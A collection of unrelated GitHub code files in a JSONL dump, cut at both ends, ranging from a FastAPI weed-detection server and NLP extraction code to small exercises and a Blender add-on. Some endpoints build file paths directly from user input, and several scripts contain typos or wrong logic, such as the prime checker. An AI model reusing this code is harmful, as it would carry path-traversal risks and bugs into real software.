results.pandas().xyxy[0].to_json(orient=\"records\")\n detect_res = json.loads(detect_res)\n return {\"result\": detect_res}\n\n\n@app.post(\"/object-to-img\")\nasync def detect_return_base64_img(file:bytes = File(...) ):\n input_image = get_image_from_bytes(file)\n results = model(input_image)\n results.render() # updates results.imgs with boxes and labels\n for img in results.imgs:\n bytes_io = io.BytesIO()\n img_base64 = Image.fromarray(img)\n img_base64.save(bytes_io, format=\"jpeg\")\n rand = random.choice(mylist)\n \n img_base64.save(IMAGEDIR+rand+'.jpeg')\n path = f\"{IMAGEDIR}{rand}\"\n return dict(path=rand)\n \n@app.post(\"/object-to-img-pest\")\nasync def detect_return_base64_img(file:bytes = File(...) 
):\n input_image = get_image_from_bytes(file)\n results = pest_model(input_image)\n results.render() # updates results.imgs with boxes and labels\n for img in results.imgs:\n bytes_io = io.BytesIO()\n img_base64 = Image.fromarray(img)\n img_base64.save(bytes_io, format=\"jpeg\")\n\n rand = random.choice(mylist)\n img_base64.save(IMAGEDIR+rand+'.jpeg')\n path = f\"{IMAGEDIR}{rand}\"\n return dict(path=rand)\n\n@app.post(\"/object-to-json-pest\")\nasync def detect_pest_return_json_result(file: bytes = File(...)):\n input_image = get_image_from_bytes(file)\n results = pest_model(input_image)\n detect_res = results.pandas().xyxy[0].to_json(orient=\"records\")\n detect_res = json.loads(detect_res)\n return {\"result\": detect_res}\n\n\n@app.get(\"/img/{image_filename}\")\ndef img(image_filename:str):\n return FileResponse(\"fastapi-images/\"+image_filename+\".jpeg\")\n\n@app.get(\"/products/insectisides\")\ndef product_list():\n file = open('data.json')\n json_data = json.load(file)\n file.close()\n return json_data\n\n@app.get(\"/products/herbisides\")\ndef product_list():\n file = open('herbiside.json')\n json_data = json.load(file)\n file.close()\n return json_data\n\n\n\n@app.post(\"/batch\")\ndef detect_batch(path: str):\n BATCHDIR= path\n model = get_yolov5()\n # Model\n imgs =[]\n # Images\n #imgs = [IMAGEDIR + f for f in IMAGEDIR] # batch of images\n for filename in os.listdir(BATCHDIR):\n f = os.path.join(BATCHDIR, filename)\n # checking if it is a file\n if os.path.isfile(f):\n im=Image.open(f)\n imgs.append(f)\n print(imgs)\n # Inference\n results = model(imgs)\n results.print() \n res = results.pandas().xyxy[0].to_json(orient=\"records\")\n res1 = results.pandas().xyxy[1].to_json(orient=\"records\")\n final = res+res1\n \n return {\"msg\":final}","repo_name":"Pineapple-1/weed-detection","sub_path":"yolov5-fastapi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39040052880","text":"import spacy\nimport io\nimport sys, nltk, os\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom nltk.corpus import wordnet\nfrom collections import Counter\nfrom pprint import pprint\nfrom nltk.stem import PorterStemmer\nfrom nltk.parse.stanford import StanfordDependencyParser\n\n\n\nnlp = spacy.load('en')\n\nos.environ['JAVAHOME']=\"/Library/Java/JavaVirtualMachines/jdk1.8.0_121.jdk/Contents/Home\"\nstan_dep_parser = StanfordDependencyParser(\"jars/stanford-parser.jar\", \"jars/stanford-parser-3.4.1-models.jar\")\n\nport_stemmer = PorterStemmer()\nphrase_list = ['nn','det','num','number','amod','advmod','poss','dep','conj','cc']\n# extract easy information templates first\n# amount = [ent for ent in doc if (ent.ent_type_ == \"MONEY\")]\n# date = [ent for ent in doc if (ent.ent_type_ == \"DATE\" or ent.ent_type_ == \"TIME\")]\n\ndef get_noun_phrases(word,sentence):\n # print(\"reached word is \",word)\n doc = nlp(sentence)\n index = 0\n nounIndice = 0\n for token in doc:\n if token.text == word and token.pos_ == 'NOUN':\n nounIndice = index\n index = index + 1\n # for node in [doc[nounIndice].left_edge : doc[nounIndice].right_edge]:\n if doc[nounIndice].left_edge.tag_ in ['IN','TO']:\n left_index = doc[nounIndice].left_edge.i+1\n else:\n left_index = doc[nounIndice].left_edge.i\n span = doc[left_index : doc[nounIndice].right_edge.i+1]\n span.merge()\n\n result = word\n for token in doc:\n if word in token.text:\n # 
print(token.text,\"-----------------------------\")\n result = token.text\n for t in doc.noun_chunks:\n # print(t,\"+++++++++++++++++++++++++++++++++++\")\n if result in t.text:\n result = t.text\n\n # print(\"result is *******\",result)\n # check_tokens = word_tokenize(result)\n return result\n\ndef get_full_word(word,parsetree):\n full_word = \"\"\n for triple in parsetree:\n # print(\"triple in full_word is \",triple)\n if(triple[0][0] == word and (triple[1] in phrase_list)):\n full_word = full_word + \" \" + get_full_word(triple[2][0],parsetree)\n\n full_word = full_word + \" \" + word\n return full_word\n\ndef extract_np(psent):\n for subtree in psent.subtrees():\n if subtree.label() == 'NP':\n yield ' '.join(word for word, tag in subtree.leaves())\n\ndef get_parse_tree(sentence):\n\n dependency_parser = stan_dep_parser.raw_parse(sentence)\n doc = nlp(sentence)\n parsetree = []\n dep = dependency_parser.next()\n for triple in dep.triples():\n parsetree.append(triple)\n # print(triple)\n return parsetree\n\ndef passive(parsetree):\n doc = nlp(sentence)\n\n impact = \"\"\n impact_word = \"\"\n cause_subject = \"\"\n cause_object = \"\"\n\n for ent in doc:\n if ((ent.dep_ == \"pobj\" or ent.dep_ == \"dobj\") and ent.head.text == \"by\"):\n Predictor = get_noun_phrases(ent.text,sentence)\n \n should_restart = True\n restarted = False\n while should_restart == True:\n should_restart = False\n for triple in parsetree:\n\n if restarted == False and triple[0][1] in ['VBD'] and triple[1] in ['ccomp','rcmod','vmod','xcomp']:\n\n impact_word = triple[0][0]\n impact = get_noun_phrases(triple[0][0],sentence)\n should_restart = True\n restarted = True\n break\n\n elif triple[0][0] == impact_word and triple[1] == 'nsubj':\n cause_subject = get_noun_phrases(triple[2][0],sentence)\n\n elif triple[0][1] == 'VBN' and triple[1] == 'nsubjpass':\n cause_object = get_noun_phrases(triple[2][0],sentence)\n\n print(\"predictors:\",predictors)\n print(\"Predictor:\", Predictor)\n print(\"Impact:\", impact)\n print(\"cause_subject:\",cause_subject)\n print(\"cause_object:\",cause_object)\n # print(\"Date:\", date)\n\n\ndef extract_filled_templates(sentence,stem):\n doc = nlp(sentence)\n # merge entities and noun chunks into one token\n spans = list(doc.ents) + list(doc.noun_chunks)\n for span in spans:\n span.merge()\n\n parsetree = get_parse_tree(sentence)\n\n \n\n Predictor = \"\"\n impact = \"\"\n impact_word = \"\"\n cause_subject = \"\"\n cause_object = \"\"\n \n\n for triple in parsetree:\n\n if triple[0][1] in ['VBD','VBN'] and triple[1] in ['nsubj','nsubjpass']:\n Predictor = get_noun_phrases(triple[2][0],sentence)\n\n elif triple[0][1] in ['VBD'] and triple[1] in ['ccomp','rcmod','vmod','xcomp']:\n if(triple[2][1] == 'VBN'):\n return passive(parsetree)\n \n impact_word = triple[2][0]\n impact = get_noun_phrases(triple[2][0],sentence)\n\n elif triple[0][0] == impact_word and triple[1] == 'nsubj':\n cause_subject = get_noun_phrases(triple[2][0],sentence)\n\n elif triple[0][0] == impact_word and triple[1] == 'dobj':\n cause_object = get_noun_phrases(triple[2][0],sentence)\n\n\n \n print(\"Predictor:\", Predictor)\n print(\"Impact:\", impact)\n print(\"cause_subject:\",cause_subject)\n print(\"cause_object:\",cause_object)\n # print(\"Date:\", date)\n\ndef get_subject_object(word_index,lemmas):\n if (word_index + 1 < len(lemmas) - 1 and lemmas[word_index + 1] == 'by'):\n # passive voice\n passive = True\n sub_sentence = ' '.join(lemmas[word_index + 2:])\n obj_sentence = ' '.join(lemmas[:word_index])\n 
else:\n # active voice\n sub_sentence = ' '.join(lemmas[:word_index])\n obj_sentence = ' '.join(lemmas[word_index + 1:])\n\n return sub_sentence,obj_sentence\n\n\ndef extract_filled_templates2(sentence,stem):\n impact_word = \"\"\n cause_subject = \"\"\n cause_object = \"\"\n Predictor = \"\"\n imp_sub_sentence = \"\"\n impact_subjects = []\n cause_object_word = \"\"\n\n lmtzr = nltk.WordNetLemmatizer()\n word_tokens = word_tokenize(sentence)\n # lemmas = [lmtzr.lemmatize(token, 'v') for token in word_tokens]\n # lemma_set = set(lemmas)\n\n # for item in lemma_set:\n # print(\"stem is \",stem,\"item is \",item)\n # if stem in item:\n # matching_template = item\n\n matching_template = stem\n word_index = word_tokens.index(matching_template)\n # divide the sentence before the template verb and after the template verb by considering 'by' to be active or passive voice determiner\n \n sub_sentence,obj_sentence = get_subject_object(word_index,word_tokens)\n # print(sub_sentence)\n # print(obj_sentence)\n\n # include grammar for extracting head level noun phrases in the template\n grammar = r\"\"\"\n NP: {?*} # chunk determiner/possessive, adjectives and noun\n {+} # chunk sequences of proper nouns\n {+} # chunk consecutive nouns\n {+}\n {+}\n \"\"\"\n cp = nltk.RegexpParser(grammar) # Define Parser for extracting noun phrases\n\n sub_tagged_sent = nltk.pos_tag(sub_sentence.split())\n sub_tokens = word_tokenize(sub_sentence)\n sub_parsed_sent = cp.parse(sub_tagged_sent)\n predictors = set([get_noun_phrases(npstr,sentence) for npstr in extract_np(sub_parsed_sent)])\n # predictors = [get_noun_phrases(entry,sub_sentence) for entry in sub_tagged_sent]\n\n parsetree = get_parse_tree(sentence)\n for triple in parsetree:\n # if 'VB' in triple[0][1] and triple[1] in ['nsubj']:\n if stem in triple[0][0]:\n predictor_word = triple[2][0]\n # print(\"Predictor word is \",predictor_word)\n break\n # for entry in predictors:\n # if predictor_word in entry:\n # Predictor = entry\n Predictor = get_noun_phrases(predictor_word,sub_sentence)\n\n\n\n # \n \n\n parsetree_sub = get_parse_tree(obj_sentence)\n impact_word = \"\"\n for triple in parsetree_sub:\n # print(\"triple in sub sentence is \",triple)\n if 'VB' in triple[0][1] and triple[1] == 'nsubj':\n if(triple[0][0] in ['was','is']):\n continue\n impact_word = triple[0][0]\n # print(\"impact_word found is ************\",impact_word)\n word_tokens = word_tokenize(obj_sentence)\n # lemmas = [lmtzr.lemmatize(token, 'v') for token in word_tokens]\n word_index_imp = word_tokens.index(impact_word)\n imp_sub_sentence,imp_obj_sentence = get_subject_object(word_index_imp,word_tokens)\n \n if triple[0][0] == impact_word and triple[1] == 'nsubj':\n cause_subject = get_noun_phrases(triple[2][0],imp_sub_sentence)\n\n elif triple[0][0] == impact_word and triple[1] == 'dobj':\n cause_object = get_full_word(triple[2][0],parsetree_sub)\n break\n \n # elif impact_word != \"\" and triple[2][1] == 'NN':\n # cause_object = get_full_word(triple[2][0],parsetree_sub)\n # break\n \n # if cause_subject == \"\":\n # obj_tagged_sent = nltk.pos_tag(imp_sub_sentence.split())\n # obj_parsed_sent = cp.parse(obj_tagged_sent)\n # impact_subjects = set([get_noun_phrases(npstr,imp_sub_sentence) for npstr in extract_np(obj_parsed_sent)])\n \n\n\n \n\n if impact_word == \"\" or cause_object == \"\":\n doc_sub = nlp(obj_sentence)\n for triple in parsetree_sub:\n if triple[1] in ['pobj','dobj']:\n cause_object_word = triple[2][0]\n # print(\"cause_object word is **\",cause_object_word)\n break\n \n 
for entry in doc_sub.noun_chunks:\n if cause_object_word in entry.text:\n cause_object = get_full_word(entry.text,parsetree_sub)\n else:\n impact_subjects.append(entry.text)\n\n\n print(\"Predictor:\",predictors)\n # print(\"Predictor:\", Predictor)\n # print(\"impact_subjects\",impact_subjects)\n print(\"cause_subject:\",cause_subject)\n print(\"Impact:\", impact_word)\n print(\"cause_object:\",cause_object)\n\n\ndef main():\n sentence = unicode(sys.argv[1],'utf-8')\n # print(sentence)\n stem = unicode(sys.argv[2],'utf-8')\n # print(\"stem is \",stem)\n # stem = u\"predicted\"\n # sentence = u\"Everyone on Wall Street predicted the dollar's three-year bear market would get even worse this year.\"\n # sentence = u\"A chip-industry's prediction showed, revenue for semiconductor-manufacturing equipment would decline 19% this year to $22.8 billion.\"\n # sentence = u\"Elliott Platt predicted that business activity will expand at a lethargic 2% annual rate in 1987's first quarter.\"\n # sentence = u\"Yesterday's news that fourth quarter GDP rose a healthy 3.5% was predicted by media and Beltway bear in the past four years.\"\n # sentence = u\"A Dow Jones Newswires survey of 18 banks showed a median forecast for a dollar decline of about 9% against the euro and the yen by the end of next year.\"\n # sentence = u\"Berson also nailed his forecast for the change in the consumer-price index, which advanced 2.8% for the 12 months through May.\"\n # # extract_filled_templates(sentence,stem)\n # sentence = u\"Chief executives of nation's largest corporations anticipate slower growth for the economy next year.\"\n # sentence = u\"Wall Street generalists had anticipated an 85,000 drop.\"\n # sentence = u\"Federal Reserve Bank of Boston estimated the program could create one million jobs over two years.\"\n # sentence = u\"Lufkin & Jenrette Inc predicted the Fed will cut the discount rate to 5% by mid-February. 
\"\n extract_filled_templates2(sentence,stem)\n \n\nif __name__ == '__main__':\n main()\n\n","repo_name":"arijeet-roy/Information-Extractor-NLP","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":11571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42214952192","text":"from tkinter import *\r\nimport random\r\n\r\nroot=Tk()\r\n\r\nroot.title(\"Picnic Bag List\")\r\nroot.geometry(\"300x200\")\r\nroot.configure(bg=\"#6dbbbf\")\r\n\r\nitems=[\"food\",\"phone\",\"Blanket\",\"Drinks\",\"Chocolates\"]\r\nprint(items)\r\n\r\noutput=Label(root,text=\"Items: Food, Phone, Blanket, Drinks, Chocolates\")\r\noutput.place(relx=0.5,rely=0.4,anchor=CENTER)\r\n\r\noutput=Label(root,bg=\"#6dbbbf\",fg=\"green\")\r\n\r\ndef thingy():\r\n bob=random.randint(0,4)\r\n chosen=items[bob]\r\n print(chosen)\r\n output[\"text\"]=\" You should put \" + chosen + \" in your bag\"\r\n \r\nbtn=Button(root,text=\"Which Item to put in the bag?\", command=thingy, bg=\"purple\", fg=\"yellow\")\r\nbtn.place(relx=0.5,rely=0.5,anchor=CENTER)\r\noutput.place(relx=0.5,rely=0.65,anchor=CENTER)\r\n\r\nroot.mainloop()","repo_name":"Pandaloo808/Picnic-bag","sub_path":"Picnic bag.py","file_name":"Picnic bag.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"824960617","text":"#imports for SQL data part \nimport pyodbc \nfrom datetime import datetime, timedelta\nimport pandas as pd \n\n#imports for sending email\nfrom email.mine.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nimport smtplib\n\ndate = datetime.today() - timedelta(days=7) #get the date 7 days ago\n\ndate = date.strftime(\"%Y-%m-%d\") # convert to format yyyy-mm-dd\n\ncnxn = pyodbc.connect(cnxn_str) #initialise connection (assume cnxn_str already defined)\n\n# build up our query string \nquery = (\"SELECT * FROM customers\"\n f\"WHERE joinDate > '{date}'\")\n\n#execute the query and read to a dataframe in python \ndata = pd.read_sql(query, cnxn)\n\ndel cnxn # close the connection \n\n#make a few calculations \nmean_payment = data['payment'].mean()\nstd_payment = data['payment'].std()\n\n# get max payment and product details \nmax_vals = data[['product', 'payment']].sort_values(by=['pament'], ascending=False.iloc[0])\n\n#write an email message using the email library and send using smtplib\ntxt = (f\"Customer reporting for period {date} - {datetime.today().strftime('%Y-%m-%d')}.\\n\\n\"\n f\"Mean payment amount received: {mean_payment}\\n\"\n f\"Standard deviation of payment amounts: {std_payments}\\n\"\n f\"Highest payment amount of {max_vals['payment']}\"\n f\"received from {max_vals['product']} product.\")\n\n#we build the message using the email librar and send using smtplib\nmsg = MIMEMultipart()\nmsg['Subject'] = \"Automated customer report\" #set email subject\nmsg.attach(MIMEText(txt)) #add text contents \n\n#we will send via outlook, first we initialise connection to main server\nsmtp = smtplib.SMTP('smtp-mail.outlook.com', '587')\nsmtp.ehlo() #say hello to the server \nsmto.starttls() #we will communicate using TLS encrytion\n\n#send email to our boss \nsmtp.sendmail('joebidden@mail.com', 'joebidden@mail.com', msg.as_string())\n\n#finalls disconnect from the mail server 
\nsmtp.quit()","repo_name":"ekck/SQL-server-with-python","sub_path":"automatedreporting.py","file_name":"automatedreporting.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"69967018824","text":"#Exercício Adicional 1\n\n#Escreva um programa que receba um número inteiro positivo na entrada e verifique se é primo. Se o número for primo, imprima \"primo\". Caso contrário, imprima \"não primo\".\n\nn = int(input(\"Digite um n: \"))\np = n // 2\n\nwhile n > 0:\n\tif (n != 1) and (p % 2) != 0:\n\t\tprint(\"primo\")\n\t\tn -= n #FLAG. Indicador de passagem\n\telse: #if (n = 1) and (p % 2) == 0:\n\t\tprint(\"não é primo\")\n\t\tn -= n #FLAG. Indicador de passagem","repo_name":"deomorxsy/kata","sub_path":"languages/noob/python/USP_CDC-com-Python/semana 4/primalidade.py","file_name":"primalidade.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15221536560","text":"#!/usr/bin/env python\nimport os\nimport json\nfrom dotenv import load_dotenv\nimport cherrypy\nfrom cherrypy.lib.static import serve_file\nfrom SensorManager import SensorManager\nfrom subprocess import call\n\ncherrypy.config.update({'log.screen': False})\n\nclass Root(object):\n\n @cherrypy.expose\n def requestImage(self, *args, **kwargs):\n print('image request made')\n try:\n call([\"fswebcam\",\"-r\", \"1280x720\", \"--no-banner\", \"image.png\"])\n cherrypy.response.headers['Content-type'] = 'image/png'\n f = open('image.png', 'rb')\n return f.read()\n except Exception as e:\n print('Error creating image')\n print(e)\n\n # Check if sensor can be created\n @cherrypy.expose\n @cherrypy.tools.json_out()\n def sensorCheck(self, *args, **kwargs):\n print('checking sensor')\n i = 0\n\n while True:\n sensor = os.getenv('SENSOR_{}_HARDWARE_NAME'.format(i))\n if sensor is None:\n return 'unhealthy'\n break\n if sensor == kwargs['hardwareSensor']:\n break\n i = i + 1\n cherrypy.response.headers['Content-Type'] = \"application/json\"\n test = sensorManager.testSensor(i, kwargs['readingType'])\n return json.dumps(test)\n\n\n # Check if station exists\n @cherrypy.expose\n def health(self, *args, **kwargs):\n return 'healthy'\n\n # Check if sensor is currently running\n @cherrypy.expose\n def sensorHealth(self, *args, **kwargs):\n result = sensorManager.checkSensor(kwargs)\n if result == 'unhealthy':\n cherrypy.response.status = 500\n return result\n # Start a sensor\n @cherrypy.expose\n def startSensor(self, *args, **kwargs):\n sensorManager.startSensor()\n\n # Stop a sensor\n @cherrypy.expose\n def stopSensor(self, *args, **kwargs):\n sensorManager.stopSensor()\n\n # Get list of available sensors\n @cherrypy.expose\n @cherrypy.tools.json_out()\n def list(self, *args, **kwargs):\n i = 0\n sensors = []\n while True:\n sensor = os.getenv('SENSOR_{}_HARDWARE_NAME'.format(i))\n if sensor is None:\n break\n readingType = os.getenv('SENSOR_{}_READING_TYPE'.format(i))\n sensorType = os.getenv('SENSOR_{}_POLLER'.format(i))\n sensors.append({\"name\": sensor, 'readingType': readingType, 'sensorType': sensorType})\n i += 1\n\n\n cherrypy.response.headers['Content-Type'] = \"application/json\"\n return json.dumps(sensors)\n\n\ndef RunServer():\n cherrypy.tree.mount(Root(), '/')\n cherrypy.server.socket_host = \"0.0.0.0\"\n cherrypy.server.socket_port = int(os.getenv('PORT'))\n cherrypy.engine.start()\n cherrypy.engine.block()\n\n\nif __name__ == 
\"__main__\":\n print(\"starting server!\")\n load_dotenv()\n sensorManager = SensorManager()\n RunServer()\n","repo_name":"cyrillegin/dragonfly","sub_path":"satellite/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17868563897","text":"def help_me_mom(i, j, shark):\n\n global fish_Tank, arr, N, cnt\n\n visited = [[0]*N for l in range(N)]\n q=[]\n q.append([i, j])\n visited[i][j] = 1\n fish_Find = [] # 먹을 수 있는 물고기의 좌표\n while q:\n if not fish_Find:\n for s in range(len(q)):\n qo = q.pop(0)\n i = qo[0]\n j = qo[1]\n\n for k in range(4):\n ni = i + di[k]\n nj = j + dj[k]\n if ni >= 0 and nj >= 0 and ni < N and nj < N and visited[ni][nj] == 0 and fish_Tank[ni][nj] <= shark:\n if 0 < fish_Tank[ni][nj] < shark:\n arr[ni][nj] = arr[i][j] + 1\n visited[ni][nj] = 1\n fish_Find.append([ni, nj])\n else:\n arr[ni][nj] = arr[i][j] + 1\n visited[ni][nj] = 1\n q.append([ni, nj])\n else:\n break\n if fish_Find:\n fi = sorted(fish_Find).pop(0)\n fix = fi[0]\n fiy = fi[1]\n fish_Tank[fix][fiy] = 0\n time_Check.append(arr[fix][fiy])\n cnt += 1\n if cnt == shark:\n cnt = 0\n shark += 1\n help_me_mom(fix, fiy, shark)\n\n\ndi = [-1,0,0,1]\ndj = [0,-1,1,0]\n\nN = int(input())\nfish_Tank = [list(map(int, input().split())) for i in range(N)]\narr = [[0]*N for i in range(N)]\n\nshark = 2\ncnt = 0\ntime_Check = [0]\n\nI = -1\nfor i in range(N):\n for j in range(N):\n if fish_Tank[i][j] == 9:\n fish_Tank[i][j] = 0\n I, J = i, j\n help_me_mom(I, J, shark)\n break\n if I != -1:\n break\n\nprint(time_Check[-1])","repo_name":"cdh3261/Algorithm_Problems","sub_path":"BAEKJOON/탐색&시뮬/아기상어-주석X.py","file_name":"아기상어-주석X.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13297212780","text":"\n\nimport itertools \n\nglobal chars\nchars=[\"a\",\"c\",\"g\",\"t\"]\n\n\n\n######################################################################################\n#******function to compute max char in score matrix\ndef computeMax(l,start): \n max_ind=0\n max_char=chars[0]\n max_val=l[0]\n for u in range(start,len(chars)):\n if l[u]>max_val:\n max_val=l[u]\n max_char=chars[u]\n max_ind=u\n \n\n return max_val,max_char,max_ind\n\n##################################################################################################\n#******function takes a sequence of dna and computes its score matrix and return suggested motif \ndef scoreMat(dna_seq):\n \n #tanspose for easier computations\n dna_seq=[[dna_seq[j][i] for j in range(len(dna_seq))] for i in range(len(dna_seq[0]))]\n \n a_count=0\n c_count=0\n g_count=0\n t_count=0\n\n list=[]\n for i in dna_seq:\n for j in i:\n if j==\"a\":\n a_count+=1\n if j==\"c\":\n c_count+=1\n if j==\"g\":\n g_count+=1\n if j==\"t\":\n t_count+=1\n list.append(str(a_count)+str(c_count)+str(g_count)+str(t_count))\n a_count=0\n c_count=0\n g_count=0\n t_count=0\n count_matrix=[[list[j][i] for j in range(len(list))] for i in range(len(list[0]))]\n \n j=0\n sum_list=[]\n\n sg_motif=\"\"\n cons_score=0\n for m in range(k):\n for i in range(len(count_matrix)):\n sum_list.append(int(count_matrix[i][j])) \n same_val=[]\n max_val,max_char,max_index=computeMax(sum_list,0) \n for i in range(max_index+1,len(sum_list)):\n if sum_list[i]==max_val:\n st=sg_motif\n st+=chars[sum_list[i]]\n same_val.append(st) \n sg_motif+=max_char\n cons_score+=max_val\n sum_list=[]\n j+=1\n 
sg_motifs=[]\n #to handle motifs with same value in two or more chars ex: A&T both have same value in count matrix\n for j in range(len(same_val)):\n same_val[j]+=sg_motif[len(same_val[j]):]\n sg_motifs.append(same_val[j])\n cons_score=round((cons_score/(t*k))*100)\n sg_motifs.append(sg_motif)\n\n return count_matrix,sg_motifs,cons_score\n \n\n\n##################################################################################\n#*****takes a DNA, num of seqs in dna, length of dna seq, kmer length,and returns \n#***** list of its motifs, their score, and their starting posions\n\ndef motifSearch(dna,t,n,k):\n indexes=itertools.product(range(n-k), repeat=t)\n score_arr=[]\n motif_arr=[]\n startPos_arr=[]\n for i in indexes:\n v=0\n k_list=[]\n for j in i:\n p=dna[v][j:j+k]\n k_list.append(p)\n v+=1\n par_score=0\n sug_motifs=[]\n _,sug_motifs,par_score=scoreMat(k_list)\n #adding only unique motifs \n for j in sug_motifs:\n if j not in motif_arr: \n startPos_arr.append(i)\n score_arr.append(par_score)\n motif_arr.append(j)\n \n return score_arr,motif_arr,startPos_arr\n\n###################################################################################\n#**********MAIN*******************\n\nDNA=[\n \"ggctatccaggtactt\",\n \"gatccatacgtacacc\",\n \"aaacgttagtgcaccc\"]\n#lower bound to start our motifs selection\nlower_bound=60\n\n#length of the motif\nk=4\n\n#number of sequences in the DNA\nt=len(DNA)\n\n#length of each sequence in the DNA\nn=len(DNA[0])\n\n#arrays of all scores , motifs and starting postions\nscore_arr=[]\nmotif_arr=[]\ns_arr=[]\n\n\nscore_arr,motif_arr,s_arr= motifSearch(DNA,t,n,k)\nfinal_motifs=[]\nfinal_scores=[]\nfinal_s=[]\nfor i in range(len(score_arr)):\n if score_arr[i]>=lower_bound:\n final_scores.append(score_arr[i])\n final_motifs.append(motif_arr[i])\n final_s.append(s_arr[i])\nfor i in range(len(final_motifs)):\n print(\"motif : \",final_motifs[i], \" with score: \",final_scores[i],\"% \")\n print(\"starting positions : \",final_s[i])\n \n\n\n\n\n\n\n","repo_name":"sondos-ui/motif-finding-algorithm-python-implementation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4131559820","text":"def cont_dp(arr):\n\tsumm=[0]*len(arr)\n\tif arr[0]>0:\n\t\tsumm[0]=arr[0]\n\telse:\n\t\tsumm[0]=0\n\tfor i in range(1,len(arr)):\n\t\tif arr[i]+summ[i-1]>0:\n\t\t\tsumm[i]=arr[i]+summ[i-1]\n\t\telse:\n\t\t\tsumm[i]=0\n\tx=max(summ)\n\treturn x\narr=[1,2,3,-7,2,5,7,8,2,0,1,-4]\nprint(cont_dp(arr))","repo_name":"jayant77/DP_problems","sub_path":"contigous_sumDp.py","file_name":"contigous_sumDp.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27226490088","text":"#File path\nfileName = 'D:\\college\\AOC 2022\\Day1\\input.txt'\n\n#Reading from file\nfile = open(fileName,'r')\nread = file.readlines()\n\n#Going through the array and adding up all the calories and when we find a '\\n' character we see if the current sum is bigger than the best sum then we put current sum back on zero and start again until the end of the array.\nnewString = ''\nbestSum = 0\ncurrentSum = 0\nfor i in read:\n if i == '\\n':\n currentSum = 0\n else:\n newString = i.replace('\\n','')\n currentSum += int(newString) \n if currentSum > bestSum:\n bestSum = 
currentSum\n\nprint(bestSum)","repo_name":"Vaasco/AdventOfCode2022","sub_path":"Day1/Main_part1.py","file_name":"Main_part1.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28790076798","text":"#!/usr/bin/python\nimport re\nfrom bs4 import BeautifulSoup\nimport requests\n\npage = requests.get('https://www.worldometers.info/coronavirus/')\nsoup = BeautifulSoup(page.content, 'html.parser')\n\n# print(soup)\n\nbat_soup = soup.find_all(\"div\", {\"id\": \"maincounter-wrap\"})\n\ntitles=[]\nfor block in bat_soup:\n titles.append(block.find(\"h1\").get_text())\n\ncounts=[]\nfor block in bat_soup:\n counts.append(block.find(\"span\").get_text())\n\ncases_count=re.sub('\\D','',counts[0])\ndeath_count=re.sub('\\D','',counts[1])\n\nprint(cases_count, death_count)\n","repo_name":"cjws/Corona","sub_path":"coronaCount.py","file_name":"coronaCount.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"14274134787","text":"bl_info = {\n \"name\": \"AGS Blender tools\",\n \"description\": \"Blender add-on to render sprites to use in Adventure Game Studio\",\n \"author\": \"SanderDL\",\n \"version\": (1, 0, 0),\n \"blender\": (2, 79, 0),\n \"location\": \"3D View > Tools\",\n \"warning\": \"The script currently has no checks for duplicate or missing objects.\",\n \"wiki_url\": \"https://github.com/Sanderdl/AGS_Tools\",\n \"tracker_url\": \"https://github.com/Sanderdl/AGS_Tools/issues\",\n \"category\": \"Development\"\n}\n\nimport bpy\nimport math\n\nfrom bpy.props import (StringProperty,\n BoolProperty,\n IntProperty,\n FloatProperty,\n EnumProperty,\n PointerProperty,\n )\nfrom bpy.types import (Panel,\n Operator,\n PropertyGroup,\n )\n\n\n# ------------------------------------------------------------------------\n# properties\n# ------------------------------------------------------------------------\n\nclass RenderSettings(PropertyGroup):\n\n sidesEnum = EnumProperty(\n name=\"Sides:\",\n description=\"Number of sides to render\",\n items=[ (\"4\", \"4 sides\", \"\"),\n (\"8\", \"8 sides\", \"\")\n ]\n )\n \n path = StringProperty(\n name=\"\",\n description=\"Folder to save sprites\",\n default=\"\",\n maxlen=1024,\n subtype='DIR_PATH')\n \n cameraTarget = StringProperty(\n name=\"\",\n description=\"Object the camera uses to rotate around the subject\",\n default=\"\",\n maxlen=200)\n\n# ------------------------------------------------------------------------\n# operators\n# ------------------------------------------------------------------------\n\nclass AgsRenderOperator(bpy.types.Operator):\n bl_idname = \"ags.render\"\n bl_label = \"Render sprites\"\n\n def execute(self, context):\n scene = context.scene\n mytool = scene.my_tool\n\n sides = int(mytool.sidesEnum)\n rotationAngle = 360.0 /sides\n rotDummy = scene.objects[mytool.cameraTarget]\n \n scene.render.alpha_mode = \"TRANSPARENT\"\n \n \n for i in range(1, sides + 1):\n \n scene.render.filepath = mytool.path + \"side\" + str(i) + \"_\"\n \n bpy.ops.render.render( write_still=True, animation=True )\n \n rotDummy.rotation_euler = (0,0,math.radians(rotationAngle * i))\n print(\"side:\", i)\n \n\n rotDummy.rotation_euler = (0,0,0)\n \n return {'FINISHED'}\n \nclass SetupSceneOperator(bpy.types.Operator):\n bl_idname = \"ags.setup\"\n bl_label = \"Setup Scene\"\n \n def execute(self, context):\n \n scene = 